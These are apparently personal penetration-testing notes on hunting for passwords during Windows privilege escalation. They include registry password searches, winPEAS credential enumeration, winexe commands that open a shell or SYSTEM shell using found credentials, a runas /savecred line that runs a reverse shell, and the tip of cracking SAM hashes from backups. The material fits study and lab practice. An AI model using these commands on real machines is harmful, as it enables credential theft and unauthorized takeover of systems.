Password Hunting
Many of these will be automatically found by winpeas
This is one of the LAST things I look for because if it wasn't found by winpeas, it's probably tedious af so I don't go for it till the end
Registry
reg query HKLM /f password /t REG_SZ /s reg query HKCM /f password /t REG_SZ /sTONS of results
.\winPEASany.exe quiet filesinfo userinfoSpawn a shell
winexe -U 'admin%password123' //192.168.X.X cmd.exeOr a system shell
winexe -U 'admin%password123' --system //192.168.X.X cmd.exe
Saved Creds
.\winPEASany.exe quiet cmd windowscredscmdkey /listStart listener
runas /savecred /user:admin C:\path\to\reverseshell.exe
Config Files
Search current directory
A lot of this kind of searching will be intuitive based off of certain things noticed while enumerating
SAM
With SAM and SYSTEM files the hashes can be extracted
Cannot get these with system running, but maybe the backups
Copy to kali and crack
Last updated